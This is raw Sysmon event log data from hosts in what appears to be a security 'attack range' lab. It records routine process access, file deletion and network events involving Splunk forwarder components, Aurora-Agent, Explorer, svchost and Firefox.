Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000042183Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:34.181{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E489-63C7-2F06-00000000AF02}3916C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1010C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000042182Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:34.181{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E489-63C7-2F06-00000000AF02}3916C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000042181Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:34.181{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E489-63C7-2F06-00000000AF02}3916C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000042180Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:34.171{FE4C2B44-DE08-63C7-F104-00000000AF02}60683364C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2C00-00000000AF02}1648C:\Windows\System32\vds.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000136003D0) 10341000x800000000000000042179Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:34.169{FE4C2B44-DE08-63C7-F104-00000000AF02}60683364C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2A00-00000000AF02}2844C:\Windows\system32\wbem\unsecapp.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000136003D0) 23542300x800000000000000016688Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:35.483{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=FD39FFBB684BF9077D5CC819E5CADEDC,SHA256=AA98102BE18303BDCD074424ADDBC359E1C1E534D8369825FA273B67FF400DEF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000016687Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:35.123{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EF21D2F3854F658D4924949E2EFEA22E,SHA256=E0B85A13C26348042BD5B065AC13C0AFD07C59DF94C09F57A43E2B2C025DB016,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000042211Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:35.199{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=88522DEE3A0EEE8D812F40317FE09781,SHA256=EC8E0EF88369D65EE3B967CF657C36B6E5F4F6238EB97337EC6827E53DFB92E0,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000016689Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:36.212{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E9B8BCA8B88BC7CC400C35355E2B9D81,SHA256=7344050F34130E933F75344E9876F6B9AE9AAE4497562EBF5F4B758CA87CD7AD,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000042213Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:36.186{FE4C2B44-D9F5-63C7-0D00-00000000AF02}8927064C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2100-00000000AF02}2468C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+3a866|c:\windows\system32\rpcss.dll+3ca94|c:\windows\system32\rpcss.dll+29447|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x800000000000000042212Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:36.091{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5A4D25CF20FF43EEDD4ACDF209F2673A,SHA256=50C4CE1DC72BAC1AF96E91487C01A66BE63EAE717F0224BB4816DBBAD939F8B2,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000016690Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:37.300{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FCC6189FB28A0A0AEC47A0F4D2955039,SHA256=B12ED85BC0FC985D024661710B6A13A48727A56ACF603A109A0AE092586214B1,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000042215Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:35.666{FE4C2B44-DA6F-63C7-DB00-00000000AF02}4048C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56312-false10.0.1.12-8000- 23542300x800000000000000042214Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:37.195{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E43F1223443D8ADF5E289860FA4656E8,SHA256=21C03E9D359A357AACF87BF2EF9A7E63F27C5802D486932765C581828824A3B7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000042216Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:38.295{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E931351D34858647ECD7F57AF602E52B,SHA256=6B853D036DB25E18A800EB22C571C3E242D3ECD724DD804FA2EE292433C56381,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000016691Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:38.381{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=117B26811B5E0C8B000D3BC404A82797,SHA256=022DA87138C4BF832893C7EC3FE3EBEC296C6A11D4381360EF814DA167367D03,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000042250Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:39.839{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005708C:\Windows\Explorer.EXE{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+18459|C:\Windows\System32\SHELL32.dll+89d20|C:\Windows\System32\SHELL32.dll+8a387|C:\Windows\Explorer.EXE+3c648|C:\Windows\Explorer.EXE+3c4d4|C:\Windows\Explorer.EXE+3c441|C:\Windows\System32\windows.storage.dll+12703f|C:\Windows\System32\windows.storage.dll+125dbf|C:\Windows\System32\windows.storage.dll+19d7df|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042249Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:39.839{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005708C:\Windows\Explorer.EXE{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+897d4|C:\Windows\System32\SHELL32.dll+8a387|C:\Windows\Explorer.EXE+3c648|C:\Windows\Explorer.EXE+3c4d4|C:\Windows\Explorer.EXE+3c441|C:\Windows\System32\windows.storage.dll+12703f|C:\Windows\System32\windows.storage.dll+125dbf|C:\Windows\System32\windows.storage.dll+19d7df|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042248Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:39.824{FE4C2B44-DDF7-63C7-B604-00000000AF02}37882252C:\Windows\system32\taskhostw.exe{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6ce4|C:\Windows\System32\MSCTF.dll+f681|C:\Windows\System32\MSCTF.dll+fbf9|C:\Windows\System32\MSCTF.dll+105e3|C:\Windows\System32\MSCTF.dll+3d742|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042247Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:39.824{FE4C2B44-DDF7-63C7-B604-00000000AF02}37882252C:\Windows\system32\taskhostw.exe{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6ce4|C:\Windows\System32\MSCTF.dll+f681|C:\Windows\System32\MSCTF.dll+fbf9|C:\Windows\System32\MSCTF.dll+105e3|C:\Windows\System32\MSCTF.dll+3d742|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042246Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:39.824{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005740C:\Windows\Explorer.EXE{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+18459|C:\Windows\System32\SHELL32.dll+89d20|C:\Windows\System32\SHELL32.dll+1d764|C:\Windows\Explorer.EXE+1e118|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c437|C:\Windows\System32\windows.storage.dll+12703f|C:\Windows\System32\windows.storage.dll+125dbf|C:\Windows\System32\windows.storage.dll+19d7df|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042245Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:39.824{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005740C:\Windows\Explorer.EXE{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+897d4|C:\Windows\System32\SHELL32.dll+1d764|C:\Windows\Explorer.EXE+1e118|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c437|C:\Windows\System32\windows.storage.dll+12703f|C:\Windows\System32\windows.storage.dll+125dbf|C:\Windows\System32\windows.storage.dll+19d7df|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042244Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:39.824{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005740C:\Windows\Explorer.EXE{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+18459|C:\Windows\System32\SHELL32.dll+89d20|C:\Windows\System32\SHELL32.dll+8a387|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c437|C:\Windows\System32\windows.storage.dll+12703f|C:\Windows\System32\windows.storage.dll+125dbf|C:\Windows\System32\windows.storage.dll+19d7df|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042243Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:39.824{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005740C:\Windows\Explorer.EXE{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+897d4|C:\Windows\System32\SHELL32.dll+8a387|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c437|C:\Windows\System32\windows.storage.dll+12703f|C:\Windows\System32\windows.storage.dll+125dbf|C:\Windows\System32\windows.storage.dll+19d7df|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042242Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:39.824{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005740C:\Windows\Explorer.EXE{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c437|C:\Windows\System32\windows.storage.dll+12703f|C:\Windows\System32\windows.storage.dll+125dbf|C:\Windows\System32\windows.storage.dll+19d7df|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042241Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:39.824{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005992C:\Windows\Explorer.EXE{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+18459|C:\Windows\System32\SHELL32.dll+89d20|C:\Windows\System32\SHELL32.dll+8aac0|C:\Windows\System32\TwinUI.dll+12ce81|C:\Windows\System32\TwinUI.dll+12d6ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042240Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:39.824{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005992C:\Windows\Explorer.EXE{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+897d4|C:\Windows\System32\SHELL32.dll+8aac0|C:\Windows\System32\TwinUI.dll+12ce81|C:\Windows\System32\TwinUI.dll+12d6ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042239Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:39.824{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005992C:\Windows\Explorer.EXE{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\TwinUI.dll+12ccb9|C:\Windows\System32\TwinUI.dll+12d6ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042238Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:39.804{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832864C:\Windows\system32\svchost.exe{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+3f936|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+5518b|C:\Windows\System32\RPCRT4.dll+5386a|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042237Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:39.804{FE4C2B44-D9F5-63C7-1600-00000000AF02}12961444C:\Windows\system32\svchost.exe{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042236Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:39.804{FE4C2B44-D9F5-63C7-1600-00000000AF02}12961340C:\Windows\system32\svchost.exe{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6154|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042235Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:39.804{FE4C2B44-E48F-63C7-3106-00000000AF02}32965516C:\Program Files\Mozilla Firefox\firefox.exe{FE4C2B44-E48F-63C7-3006-00000000AF02}2428C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\Mozilla Firefox\firefox.exe+2096b|C:\Program Files\Mozilla Firefox\firefox.exe+1e523|C:\Program Files\Mozilla Firefox\firefox.exe+2c9f8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042234Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:39.787{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832864C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042233Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:39.787{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832864C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042232Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 